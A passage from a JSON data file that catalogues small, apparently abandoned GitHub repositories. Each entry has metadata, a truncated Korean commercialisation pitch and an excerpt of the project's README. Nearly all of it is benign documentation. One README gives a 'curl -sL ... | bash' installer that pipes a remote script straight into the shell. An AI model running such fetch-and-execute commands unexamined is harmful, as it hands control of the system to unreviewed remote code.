unknown, underrated PHP functions or stuff discovered, used, and learned during PHP's daily use.\n\nUsing frameworks daily, sometimes the perception of the power of the language and the basic functionalities provided by the PHP core ","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"Dhghomon/rust-fsharp","github_url":"https://github.com/Dhghomon/rust-fsharp","stars":21,"language":"","license":"MIT","abandonment_months":41,"description":"# Rust-F# 저장소 분석\n\n## 왜 보물인가\n두 가지 프로그래밍 언어를 연결하는 도구로, 기존 시스템을 현대적인 기술로 업그레이드하려는 기업들에게 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n1. **금융/보험사 내부 도구**: 오래된 F# 시스템을 더 빠른 Rust로 단계적으로 전환하는 마이그레이션 서비스\n2. **엔터프라이즈 API 판매**: 기업","readme_excerpt":"# Rust for Fsharpers and F# for Rustaceans\n\n<img src=\"RF.png\"\n     width=\"50%\" height=\"50%\"\n     style=\"float: left; margin-right: 10px;\" />\n\n# What's this repository for?\n\nIts intent is to be an informal manual for users of Rust and F# to read through to learn about the other language. Here's why I'm putting it together:\n\n[Rust is my first language](https://github.com/Dhghomon/programming_at_40/blob/master/README.md), and recently I've begun delving into languages in the Rust periphery, one of which is F# (since the Rust compiler was originally written in OCaml and it incorporates a good deal of its syntax).\n\nAlmost every F# manual is written for C# developers in mind. (\"In C# you do this, but in F# you do THIS\") That's fine, but I have no real familiarity with C#. And when I look at F# in practice I see Rust everywhere: Options, Results, match statements, iterators, and so on and so forth, and as a Rustacean there's no need to convince me of their benefits. Reading a book on F# with ","composite_score":0.501,"license_safety_tag":"safe"},{"name":"geerlingguy/turing-pi-2-cluster","github_url":"https://github.com/geerlingguy/turing-pi-2-cluster","stars":6,"language":"Jinja","license":"MIT","abandonment_months":41,"description":"# Turing Pi 2 클러스터 분석\n\n## 왜 보물인가\n작은 컴퓨터 여러 개를 연결하여 강력한 슈퍼컴퓨터처럼 만드는 방법을 공개한 희귀한 가이드입니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육용 온라인 강좌**: 학생들이 클라우드 컴퓨팅 원리를 직접 배울 수 있는 유료 온라인 교육 플랫폼\n2. **기업용 기술 컨설팅**: 중소기업의 IT 인프라 구축을","readme_excerpt":"# Turing Pi 2 Cluster\n\nDEPRECATED: Please see my [pi-cluster](https://github.com/geerlingguy/pi-cluster) project for active development.\n\n[![CI](https://github.com/geerlingguy/turing-pi-2-cluster/workflows/CI/badge.svg?branch=master&event=push)](https://github.com/geerlingguy/turing-pi-2-cluster/actions?query=workflow%3ACI)\n\n<p align=\"center\"><a href=\"https://www.youtube.com/watch?v=kgVz4-SEhbE\"><img src=\"images/turing-pi-2-hero.jpg?raw=true\" width=\"500\" height=\"auto\" alt=\"Turing Pi 2 - Raspberry Pi Compute Module Cluster\" /></a></p>\n\nThis repository will contain examples and automation used in Turing Pi 2-related videos on [Jeff Geerling's YouTube channel](https://www.youtube.com/c/JeffGeerling).\n\nYou might also be interested in another Raspberry-Pi cluster I've maintained for years, the [Raspberry Pi Dramble](https://www.pidramble.com), which is a Kubernetes Pi cluster in my basement that hosts [www.pidramble.com](https://www.pidramble.com).\n\n## Usage\n\n  1. Make sure you have [Ansibl","composite_score":0.501,"license_safety_tag":"safe"},{"name":"admin-ch/CovidCertificate-App-iOS","github_url":"https://github.com/admin-ch/CovidCertificate-App-iOS","stars":7,"language":"Swift","license":"MPL-2.0","abandonment_months":40,"description":"# CovidCertificate-App-iOS 분석\n\n## 왜 보물인가\n코로나19 백신 증명서를 스마트폰에서 관리하는 기술로, 공공 보건 시스템과 연동되는 신뢰할 수 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **공항·항공사 SaaS**: 탑승객의 백신 증명서를 자동으로 검증하는 탑승 체크인 시스템\n2. **정부 내부 업무 도구**: 보건 당국이","readme_excerpt":"# COVID Certificate Apps - iOS\n\n[![License: MPL 2.0](https://img.shields.io/badge/License-MPL%202.0-brightgreen.svg)](https://github.com/admin-ch/CovidCertificate-App-iOS/blob/main/LICENSE)\n\nThis project is released by the the [Federal Office of Information Technology, Systems and Telecommunication FOITT](https://www.bit.admin.ch/)\non behalf of the [Federal Office of Public Health FOPH](https://www.bag.admin.ch/).\nThe app design, UX and implementation was done by [Ubique](https://www.ubique.ch?app=github).\n\n## COVID Certificate App\n\nCOVID Certificate is the official app for storing and presenting COVID certificates issued in Switzerland.\nThe certificates are kept and checked locally on the user's phone.\n\n<a href='https://apps.apple.com/us/app/covid-certificate/id1565917320'>\n<img alt='Download on the App Store' src='badge-appstore.svg' width='25%'/>\n</a>\n\n<p align=\"center\">\n<img src=\"Documentation/screenshots/wallet/en/screenshot1.png\" width=\"20%\">\n<img src=\"Documentation/screenshots/w","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"fossasia/jugaadfest.com","github_url":"https://github.com/fossasia/jugaadfest.com","stars":11,"language":"HTML","license":"Apache-2.0","abandonment_months":93,"description":"# Jugaadfest.com 저장소 분석\n\n## 왜 보물인가\n아시아 지역의 창의적인 기술 문화를 연결하고 홍보하는 축제 플랫폼으로, 신흥 기술 커뮤니티의 네트워킹 허브 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **축제/이벤트 관리 SaaS**: 아시아 지역 기술 축제, 해커톤, 개발자 컨퍼런스의 온라인 플랫폼으로 운영\n- **내부 업무 도구","readme_excerpt":"# jugaadfest.com\n\nWebsite for Jugaadfest India\n\nhttps://jugaadfest.com\n","composite_score":0.501,"license_safety_tag":"safe"},{"name":"danpovey/fast_rnnt","github_url":"https://github.com/danpovey/fast_rnnt","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":33,"description":"# fast_rnnt 프로젝트 분석\n\n## 왜 보물인가\n음성을 텍스트로 빠르게 변환하는 기술을 효율적으로 처리하는 오픈소스 도구로, 실시간 음성 인식이 필요한 다양한 서비스에 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 자막 생성 SaaS**\n- 화상 회의나 온라인 강의 중에 실시간으로 말을 글로 변환해주는 구독 서비스\n\n**2. 음성","readme_excerpt":"\nThis project implements a method for faster and more memory-efficient RNN-T loss computation, called `pruned rnnt`.\n\nNote: There is also a fast RNN-T loss implementation in [k2](https://github.com/k2-fsa/k2) project, which shares the same code here. We make `fast_rnnt` a stand-alone project in case someone wants only this rnnt loss.\n\n## How does the pruned-rnnt work ?\n\nWe first obtain pruning bounds for the RNN-T recursion using a simple joiner network that is just an addition of the encoder and decoder, then we use those pruning bounds to evaluate the full, non-linear joiner network.\n\nThe picture below display the gradients (obtained by `rnnt_loss_simple` with `return_grad=true`) of lattice nodes, at each time frame, only a small set of nodes have a non-zero gradient, which justifies the pruned RNN-T loss, i.e., putting a limit on the number of symbols per frame.\n\n<img src=\"https://user-images.githubusercontent.com/5284924/158116784-4dcf1107-2b84-4c0c-90c3-cb4a02f027c9.png\" width=\"90","composite_score":0.501,"license_safety_tag":"unknown"},{"name":"Electron-Store/electron-app-store","github_url":"https://github.com/Electron-Store/electron-app-store","stars":5,"language":"Vue","license":"MIT","abandonment_months":49,"description":"# Electron-Store/electron-app-store 평가\n\n## 왜 보물인가\nWindows, Mac, Linux 등 여러 운영체제에서 작동하는 프로그램을 쉽게 만들 수 있는 기술로, 기업들이 비용을 절감하면서 다양한 기기에 동시에 배포할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 대기업의 재무팀이 데이터 분석 프로그램","readme_excerpt":"# Electron App Store\n<img src=\"screenshots/repo-card.jpg\" alt=\"Repo Card\"/>\n\n[![CodeFactor](https://www.codefactor.io/repository/github/electron-store/electron-app-store/badge)](https://www.codefactor.io/repository/github/electron-store/electron-app-store)\n\n<a href=\"https://www.producthunt.com/posts/electron-app-store?utm_source=badge-review&utm_medium=badge&utm_souce=badge-electron-app-store#discussion-body\" target=\"_blank\"><img src=\"https://api.producthunt.com/widgets/embed-image/v1/review.svg?post_id=316563&theme=dark\" alt=\"Electron App Store - A Cross-Platform Open-Source App Store for Electron.js Apps | Product Hunt\" style=\"width: 250px; height: 54px;\" width=\"250\" height=\"54\" /></a>\n&nbsp;&nbsp;&nbsp;\n<a href=\"https://www.producthunt.com/posts/electron-app-store?utm_source=badge-featured&utm_medium=badge&utm_souce=badge-electron-app-store\" target=\"_blank\"><img src=\"https://api.producthunt.com/widgets/embed-image/v1/featured.svg?post_id=316563&theme=dark\" alt=\"Electron App Store - ","composite_score":0.501,"license_safety_tag":"safe"},{"name":"qinggan/phpok","github_url":"https://github.com/qinggan/phpok","stars":8,"language":"PHP","license":"MIT","abandonment_months":32,"description":"# qinggan/phpok 분석\n\n## 왜 보물인가\nPHP 프로그래밍 언어로 만든 웹사이트 구축 도구로, 복잡한 코딩 없이도 온라인 비즈니스를 시작할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 기업의 웹사이트 제작을 자동화하고 월 구독료로 수익화하는 웹빌더 서비스\n- **내부 업무 도구**: 개발사의 고객사들이 ","readme_excerpt":"phpok\r\n=====\r\n\r\n系统基于PHP+MySQL开发，是一套十分自由的CMS程序，支持各种自定义配置及字段扩展，包括站点全局参数，分类扩展，项目扩展及各种自建模块！\r\n\r\n手工安装\r\n===\r\n1. 打包下载后，请手工在 _data 目录下创建以下文件夹： **session**，**tpl_admin**，**tpl_www**，**log**，**update**，**zip**\r\n2. 请在根目录手动创建文件夹：**_cache**\r\n3. 设置 **_config/db.ini.php** 文件可写，Linux属性为 666\r\n4. 设置 **_cache**，**_data**，**res** 及子目录属性为 777\r\n5. 运行 phpokinstall.php 进行安装\r\n\r\n功能清单\r\n===\r\n* 网站基本信息（含括网站名称，LOGO，图标及站点开关等参数）\r\n* 验证码开关\r\n* 多站点模式可绑定域名指向（后台切换域名后，进行绑定）\r\n* 订单状态功能设置\r\n* 站点自定义扩展字段信息，支持分组，可针对每个分组实现开关及API接口的开关\r\n* 后台两种模式（开发模式及应用模式）分别主要服务于开发者及使用者，以防止敏感误操作\r\n* 二次密码功能，提醒管理员慎重操作\r\n* 采用【项目+分类+模块】模式，以满足各个行业的快速建表及字段功能\r\n* 基于【应用+插件+扩展】的二次开发方式，以满足复杂的二次开发定制\r\n* 功能完整的API接口，所有一切WEB能获取的数据，都有类似的API接口获取\r\n* 内置第三方API上传接口，如腾迅云，阿里云，七牛云\r\n* 管理员二维码登录（求助他人无需给密码）\r\n* 云市场功能，支持应用，扩展及插件可以直接在线上安装，支持名称模糊搜索\r\n* 内置赞功能\r\n\r\n\r\n感谢\r\n===\r\n感谢您使用我们的CMS系统，这是一款优雅并且高度自定义的程序\r\n\r\n","composite_score":0.501,"license_safety_tag":"safe"},{"name":"pop-os/beta","github_url":"https://github.com/pop-os/beta","stars":12,"language":"","license":"unknown","abandonment_months":50,"description":"# Pop-OS Beta 저장소 분석\n\n## 왜 보물인가\n리눅스 운영체제의 테스트 버전을 관리하는 저장소로, 새로운 기능 개발과 사용자 피드백 수집에 핵심적인 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 Linux 개발 환경 제공 플랫폼으로 구독 모델 운영\n2. **내부 업무 도구**: 기업의 서버 관리 시스템이나","readme_excerpt":"# Pop!\\_OS 22.04 LTS Beta Testing\n\nThank you for participating in Pop!\\_OS 22.04 LTS beta release testing. Your help improved the release for everyone. \n\nThe beta testing period is complete. Issues in this repo will be triaged and added to their respective projects.\n","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"Javascipt/Jsome","github_url":"https://github.com/Javascipt/Jsome","stars":9,"language":"JavaScript","license":"mit","abandonment_months":30,"description":"# Jsome 보물 지도\n\n## 왜 보물인가\n복잡한 데이터를 사람이 읽기 쉬운 형태로 자동 변환해주는 도구로, 데이터를 다루는 모든 디지털 업무에서 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 플랫폼에 내장하여 고객이 복잡한 통계를 한눈에 이해하도록 지원\n- **내부 업무 도구**: 기업의 데이터 처리 시","readme_excerpt":"Make your JSON objects look AWESOME!\n====================================\n\n![Jsome](https://api.travis-ci.org/Javascipt/Jsome.svg)\n![Jsome](https://david-dm.org/Javascipt/Jsome.svg)\n![Jsome](https://img.shields.io/npm/dm/jsome.svg)\n\n![Downloads stats](https://nodei.co/npm/jsome.png?downloadRank=true&stars=true)\n\n![Jsome](https://raw.githubusercontent.com/Javascipt/Jsome/master/logo.png)\n\nThis package allows you to give style to your JSON on your console!\n\n## Installation :\n\n```bash\n  $ npm install jsome\n```\n\nif you need to use jsome as a command line, you may need to instal it globally\n\n```bash\n  $ [sudo] npm install -g jsome\n```\n\n## How does it work ?\n\n#### Command line :\n\nUsing jsome as a command line, you need to run the following command that takes the path to your json file as argument\n\n```bash\n  $ jsome /path/to/your/json/file.json\n  $ jsome [options] /path/to/your/json/file.json\n```\n\nYou can also send a json string through a pipe (`|`)\n\n```bash\n  $ cat /path/to/your/json/file.js","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"oslabs-beta/deKaf","github_url":"https://github.com/oslabs-beta/deKaf","stars":11,"language":"TypeScript","license":"unknown","abandonment_months":59,"description":"# deKaf 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터 처리 시스템(카프카)을 시각적으로 관리할 수 있는 도구로, 기술 팀의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 관리 회사들이 고객에게 제공하는 대시보드 기능으로 통합\n2. **내부 업무 도구**: 금융사/통신사의 데이터팀이 실시간 데이터","readme_excerpt":"# deKaf\n\n### What is it?\n\n\nAs streaming grows increasingly common, data processing and real-time analytics become more of a necessity — but Kafka has no built-in functionality allowing users to view key performance metrics. deKaf bridges that gap: it's a web-based metrics visualization tool that monitors Kafka activity, focusing on performance and spread relevant metrics of the producers, topics, and consumers.\n\n### How it works\ndeKaf prides itself on simplicity. On the same server you have a kafka instance running, follow these steps.\n1. In the browser navigate to deKaf.app.\n2. Follow the prompts to create an account and log in. You will be redirected to the Broker Overview page.\n3. Enter your port number the kafka instance is running on and click on **_Add Port_**.\n4. Enter the topic you wish you to monitor, the number of partitions on the specified topic and the replication factor for your data. Click on **_Add Topic To Monitor_**\n\n    *You may enter as many topics as you wish to mo","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"doctrine/reflection","github_url":"https://github.com/doctrine/reflection","stars":7,"language":"PHP","license":"MIT","abandonment_months":34,"description":"# doctrine/reflection 분석 리포트\n\n## 왜 보물인가\nPHP 프로그래밍에서 코드의 구조를 자동으로 분석하고 정보를 추출할 수 있게 해주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자용 코드 분석 플랫폼에서 자동으로 함수, 변수 정보를 인식하는 기능\n2. **내부 업무 도구**: 기업 시스템의 API 문","readme_excerpt":"⚠ This package is abandoned, consider migrating to alternatives, such as\n`roave/better-reflection`. Features that are still useful to Doctrine have been\nmoved to `doctrine/persistence`⚠\n\n# Doctrine Reflection\n\n[![Build Status](https://travis-ci.org/doctrine/reflection.svg)](https://travis-ci.org/doctrine/reflection)\n[![Code Coverage](https://codecov.io/gh/doctrine/dbal/branch/reflection/graph/badge.svg)](https://codecov.io/gh/doctrine/reflection/branch/1.2.x)\n\nThe Doctrine Reflection project is a simple library used by the various Doctrine projects which adds some additional functionality on top of the reflection functionality that comes with PHP. It allows you to get the reflection information about classes, methods and properties statically.\n\n## More resources:\n\n* [Website](https://www.doctrine-project.org/)\n* [Documentation](https://www.doctrine-project.org/projects/doctrine-reflection/en/latest/)\n* [Downloads](https://github.com/doctrine/reflection/releases)\n","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"yuanguandong/react-dashboard-pro","github_url":"https://github.com/yuanguandong/react-dashboard-pro","stars":13,"language":"JavaScript","license":"MIT","abandonment_months":45,"description":"# React Dashboard Pro 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 한눈에 보기 좋게 정리해서 보여주는 기성품 틀이 있어서, 회사들이 빠르게 업무 관리 시스템을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 회사 성과 분석 플랫폼**\n판매 실적, 고객 만족도 등을 실시간으로 시각화해서 보여주는 구독형 서비스","readme_excerpt":"# React Dashboard Pro\n[![npm version](https://badge.fury.io/js/react-dashboard-pro.svg)](#) [![npm version](https://img.shields.io/badge/react-%3E16-green)](#) [![npm version](\thttps://img.shields.io/github/issues/yuanguandong/react-dashboard-pro)](#) [![npm version](\thttps://img.shields.io/github/forks/yuanguandong/react-dashboard-pro)](#) [![npm version](https://img.shields.io/github/license/yuanguandong/react-dashboard-pro)](#) [![npm version](\thttps://img.shields.io/github/stars/yuanguandong/react-dashboard-pro)](#)\n## Out-of-the-box one-stop dashboard solution \nDynamic Dashboard functionality in just a few simple steps\n\nIt solves the customization needs of Dashboard + Widget, which are almost used by the B-side of \"Thousands of People, Thousands of Faces\".\n\n## 开箱即用的一站式仪表板解决方案\n只需简单几步即可拥有动态仪表板功能  \n\n解决的是\"千人千面\"的Dashboard + Widget 客制化需求。\n\n![repository-open-graph-template副本](./snapshot.png)\n\n## Repository\nhttps://github.com/yuanguandong/react-dashboard-pro\n\n## Docs\nhttps://yuanguandong.","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"liquidnft/lnft","github_url":"https://github.com/liquidnft/lnft","stars":5,"language":"JavaScript","license":"AGPL-3.0","abandonment_months":49,"description":"# Liquid NFT (LNFT) 분석 보고서\n\n## 왜 보물인가\n디지털 자산(NFT)을 현금처럼 빠르게 사고팔 수 있는 금융 시스템으로, 지금까지 불가능했던 \"빠른 거래\"를 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. NFT 거래소 SaaS**\nNFT 판매자들이 자산을 빠르게 현금화할 수 있는 플랫폼으로 제공하고, 거래 수수료로 월 수익을 얻","readme_excerpt":"# Token Ocean\n\nToken Ocean is a web-based platform for issuing and transacting with non-fungible tokens on the [Bitcoin Liquid Network](https://blockstream.com/liquid/). Blockstream is sponsoring its development and hosting an exemplary curated instance of it for use by Bitcoin artists at [Raretoshi](https://raretoshi.com).\n\nThe plan is to separate out any Raretoshi-specific features from the core platform functionality so that anyone can adapt the platform to host their own Liquid-based NFT site but that's currently a work in progress\n\n## Features\n\n- User accounts and profiles for artists and collectors include custom avatars, contact info and biography\n- Users can follow other artists and collectors and like/favorite individual artworks\n- Artists can upload digital media files (jpg, png, gif, mp4) representing an artwork and add metadata like a title, description, and tags\n- Selected metadata is published in the [liquid asset registry](https://docs.blockstream.com/liquid/developer-gu","composite_score":0.5009,"license_safety_tag":"risky"},{"name":"aws-samples/aws-ambit-scenario-designer-ue4","github_url":"https://github.com/aws-samples/aws-ambit-scenario-designer-ue4","stars":5,"language":"C++","license":"Apache-2.0","abandonment_months":49,"description":"# AWS Ambit Scenario Designer UE4 분석\n\n## 왜 보물인가\n게임 엔진(언리얼 엔진)을 활용해 자동차 자율주행 시뮬레이션 환경을 쉽게 만들 수 있는 도구로, 자동차 업계의 AI 개발 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **자율주행 자동차 개발사**: 수천 가지 도로 상황을 가상으로 테스트하는 시뮬레이션","readme_excerpt":"# AWS Ambit Scenario Designer for Unreal Engine 4\n\nWelcome to **AWS Ambit Scenario Designer for Unreal Engine 4 (Ambit)**, a suite of tools to streamline 3D content creation at scale for autonomous vehicle and robotics simulation applications. From procedural placement of obstacles to automatic generation of whole cities, Ambit can help you quickly create the 3D environments and scenarios you need for your simulations or other 3D applications.\n\n![Ambit sample image](docs/readme-images/AmbitBanner.jpg)\n\nReview the [User Guide](https://aws-samples.github.io/aws-ambit-scenario-designer-ue4/) to learn about Ambit's capabilities and how to start using Ambit with your projects.\n\nIf you're interested in contributing to Ambit's development or would like to customize Ambit's functionality to suite your team's needs be sure to read the [\"Appendix: Contributing to Ambit Development\"](https://aws-samples.github.io/aws-ambit-scenario-designer-ue4/appendix-contributing/) section of the User Guide.\n\n","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"carlosonunez/obs-installer-for-apple-silicon","github_url":"https://github.com/carlosonunez/obs-installer-for-apple-silicon","stars":5,"language":"CMake","license":"unknown","abandonment_months":41,"description":"# obs-installer-for-apple-silicon 분석\n\n## 왜 보물인가\nApple Silicon 맥(M1, M2 등)을 사용하는 사용자들이 OBS(방송 소프트웨어)를 쉽게 설치할 수 있도록 해주는 자동화 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 방송 플랫폼이 신규 사용자를 위해 OBS 설치 마법사를 자신들","readme_excerpt":"> # ⚠️ This project is deprecated\n>\n> OBS now has native Apple Silicon builds as of v29.\n>\n> Please use the native builds.\n>\n> Visit the releases page [here](https://github.com/obsproject/obs-studio/releases)\n>\n> Thank you for supporting the Apple Silicon OBS Installer!\n\n# obs-installer-for-apple-silicon\n\nUse this script to conveniently build the latest version of OBS on Apple M1 Macs and MacBooks.\n\nThis build includes:\n\n* Mac Virtual Camera, and\n* Noise Suppression Filters (RNNoise, Speex).\n\n## How to Use\n\n> **NOTE**: An experimental version of an official ARM-based OBS app\n> exists. Skip to [this](#download-experimental-official-build-v120-and-above) section\n> to use this script to download and install it.\n\nFrom a Terminal (⌘-Space, type \"Terminal\"), simply:\n\n1. Clone this repository: `git clone https://github.com/carlosonunez/obs-installer-for-apple-silicon`\n2. Install jq from [Homebrew](https://brew.sh), via `brew install jq`\n3. Install: `cd obs-installer-for-apple-silicon && ./ins","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"nguyenary/QRCodeMonkey","github_url":"https://github.com/nguyenary/QRCodeMonkey","stars":6,"language":"PHP","license":"MIT","abandonment_months":58,"description":"# QRCodeMonkey 분석 보고서\n\n## 왜 보물인가\nQR코드를 쉽게 만들고 커스터마이징할 수 있는 도구로, 마케팅부터 물류까지 모든 비즈니스에서 필요로 하는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 브랜드 로고가 들어간 QR코드 생성 서비스를 월 구독료 모델로 판매\n- **내부 업무 도구**: 소매점, 음식점, 창고에","readme_excerpt":"# PHP Class Generate Free QRCode\r\n\r\n> 👉 A library using PHP to generate QRCode from https://www.qrcode-monkey.com free <br>\r\n> ✋ **NOTE:** Do not generate too many QRCode at once or your IP will be locked for a period of time\r\n\r\n<p align=\"center\">\r\n    <img src=\"image/src/facebook.svg\" width=\"100\"> \r\n    <img src=\"image/src/youtube.svg\" width=\"100\">\r\n    <img src=\"image/src/ninja.svg\" width=\"100\">\r\n    <img src=\"image/src/twitter.svg\" width=\"100\">\r\n    <img src=\"image/src/rain.svg\" width=\"100\">\r\n    <img src=\"image/src/jungle.svg\" width=\"100\">\r\n</p>\r\n\r\n## Getting started\r\n\r\nUse `composer` to integrate your PHP project\r\n\r\n```shell\r\ncomposer require nguyenary/qr-code-monkey\r\n```\r\n\r\n## Configuration\r\n\r\n📘 You can configure to generate QRCode or use default configuration. Below is a list of configurations that you can use\r\n\r\n<table>\r\n    <thead>\r\n        <tr>\r\n            <th>Parameter</th>\r\n            <th>Type</th>\r\n            <th>Default</th>\r\n            <th>Description</th>\r\n        <","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"deref/exo","github_url":"https://github.com/deref/exo","stars":13,"language":"Go","license":"Apache-2.0","abandonment_months":46,"description":"# deref/exo 분석 보고서\n\n## 왜 보물인가\n복잡한 소프트웨어 구조를 자동으로 분석하여 개발자들이 코드를 더 쉽게 이해할 수 있도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 코드 분석 플랫폼으로, 개발 팀이 구독하여 프로젝트 코드의 복잡도를 실시간으로 모니터링\n2. **내부 업무 도구**: 대기업의 IT 부","readme_excerpt":"# exo: a process manager & log viewer for dev\n\n**exo-** _prefix_ – external; from outside.\n\n![The Exo GUI](https://exo.deref.io/exo-shadow-screenshot.png)\n\n**Features**\n\n- [Procfile](https://docs.deref.io/exo/manifests/migrate/procfiles) and [Docker Compose](https://docs.deref.io/exo/manifests/migrate/compose) compatible process manager.\n- Terminal commands and browser-based-GUI for all functionality.\n- Multiplexed, colorizing log tailing. Toggle visibility of individual logs.\n- Dynamic process supervision: create, start, stop, restart, delete.\n\n## Getting Started\n\nInstall Exo:\n\n```bash\ncurl -sL https://exo.deref.io/install | bash\n```\n\nIf you prefer package managers or manual installation, see\nthe [install docs](https://docs.deref.io/exo/getting-started/install) for\ndetails, including uninstall instructions.\n\nNavigate to your code directory and then launch the Exo gui:\n\n```bash\nexo gui\n```\n\nTo use exo as a drop-in replacement for `foreman` or `docker-compose`, use\n`run` instead:\n\n```ba","composite_score":0.5009,"license_safety_tag":"safe"},{"name":"snap-research/CAT","github_url":"https://github.com/snap-research/CAT","stars":6,"language":"Python","license":"NOASSERTION","abandonment_months":50,"description":"# CAT 저장소 분석\n\n## 왜 보물인가\n구체적인 정보 부재로 판단이 어렵지만, 스타 수와 최근 업데이트 중단(2022년 4월)을 고려할 때 초기 단계의 연구 프로젝트로 보이며, 현재로서는 상업적 가치 평가가 제한적입니다.\n\n## 어디에 쓸 수 있나\n정보 부족으로 구체적인 활용 시나리오를 특정하기 어렵습니다. 저장소 설명과 코드 구조를 먼저 파악한 후 다","readme_excerpt":"# CAT\n[CVPR](https://openaccess.thecvf.com/content/CVPR2021/html/Jin_Teachers_Do_More_Than_Teach_Compressing_Image-to-Image_Models_CVPR_2021_paper.html) | [arXiv](https://arxiv.org/abs/2103.03467) | [website](https://dejqk.github.io/GAN_CAT) | [Tutorial (Image-to-Image)](https://lensstudio.snapchat.com/guides/machine-learning/lens-templates/) (Our method can be used in mobile devices!)\n\n<table cellpadding=\"0\" cellspacing=\"0\" >\n  <tr>\n    <td  align=\"center\">Input<br> <img src=\"images/input.gif\" width=200px></td>\n    <td  align=\"center\">Night<br> <img src=\"images/night.gif\" width=200px></td>\n    <td  align=\"center\">Style<br> <img src=\"images/style.gif\" width=200px></td>\n    <td  align=\"center\">Anime<br> <img src=\"images/anime.gif\" width=200px></td>\n  </tr>\n</table>\n\n\n\n<p align=\"center\">\n  <img src=\"images/comparison.png\" width=400>\n</p>\n\nPytorch implementation of our method for compressing image-to-image models. <br>\n[Teachers Do More Than Teach: Compressing Image-to-Image Models](https","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"assouza19/basedroid","github_url":"https://github.com/assouza19/basedroid","stars":12,"language":"Kotlin","license":"unknown","abandonment_months":60,"description":"# basedroid 저장소 분석\n\n## 왜 보물인가\n안드로이드 앱 개발을 쉽게 해주는 기초 틀(프레임워크)로, 앱 개발자들의 반복 작업을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 앱 개발사를 위한 \"빠른 앱 개발 플랫폼\" 구독 서비스로 월정액 제공\n2. **내부 업무 도구**: 대형 IT회사의 여러 안드로이드","readme_excerpt":"# BaseDroid\n<p align=\"justify\"><strong>Aline Souza - Desenvolvedora Android</strong></p>\n\n## Descrição\nO objetivo deste projeto é exemplificar o uso das boas práticas na construção de um aplicativo Android.\nEste projeto deve ser utilizado como base de estudos e/ou consultas para construção de apps mais complexos.\n\n[![Author](https://img.shields.io/static/v1?label=@author&message=Aline%20Developer&color=important)](https://github.com/assouza19)\n[![Medium](https://img.shields.io/static/v1?label=@medium&message=Siga-me&color=success)](https://medium.com/aline-souza)\n[![LinkedIn](https://img.shields.io/static/v1?label=@linkedin&message=@assouza94&color=blue)](https://www.linkedin.com/in/assouza94/)\n\n\n## 🖥️ Tecnologias que utilizei\n\n✨ Kotlin </br>\n✨ MVVM </br>\n✨ Injeção de dependência (Koin) </br>\n✨ Android Jetpack Components </br>\n✨ Consumo de API (Coroutines + Retrofit) </br>\n✨ Testes unitários (Mockito) </br>\n✨ Testes de UI (Espresso) + Robot Pattern </br>\n✨ SOLID </br>\n✨ Clean Architect","composite_score":0.5009,"license_safety_tag":"unknown"},{"name":"dheera/bokeh-camera","github_url":"https://github.com/dheera/bokeh-camera","stars":35,"language":"C++","license":"unknown","abandonment_months":58,"description":"# dheera/bokeh-camera 상용화 분석\n\n## 왜 보물인가\n카메라로 촬영한 사진에서 원하는 부분만 선명하게 만드는 효과를 간단히 구현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 사진 편집 웹사이트에서 '자동 배경 흐림' 필터 기능으로 제공\n2. **내부 업무 도구**: 부동산·자동차 판매 회사의 상품","readme_excerpt":"# bokeh-camera\n\nIf you think the Google/Zoom segmentation-based background blur effects look kind of fake, this attempts to simulate a more realistic-looking bokeh using a RealSense D455 (for best results) or D435 camera on a virtual camera device that you can use from any conferencing software.\n\nWork in progress, code not yet cleaned up, but roughly:\n\n1. Build requirements:\n\n   * librealsense2-dev\n   * libopencv-dev\n   * cmake\n   * g++ (or similar C++ compiler)\n\n1. Run `./build-this`\n\n1. Ensure that you have the `v4l2loopback` kernel module\n\n   * Ubuntu: `sudo apt install v4l2loopback-dkms`\n   * Fedora/RHEL: `sudo dnf install v4l2loopback`\n\n1. Set up a v4l2 loopback device at `/dev/video20`\n\n   ```\n   sudo modprobe -r v4l2loopback  # This one can fail if the module isn't loaded, that's okay\n   sudo modprobe v4l2loopback devices=1 video_nr=20 exclusive_caps=1\n   ```\n\n1. Run `./BokehCamera\n\n1. Select the virtual camera on Google Meet or Zoom or whatever you use\n\n# Controls\n\nWhile it is 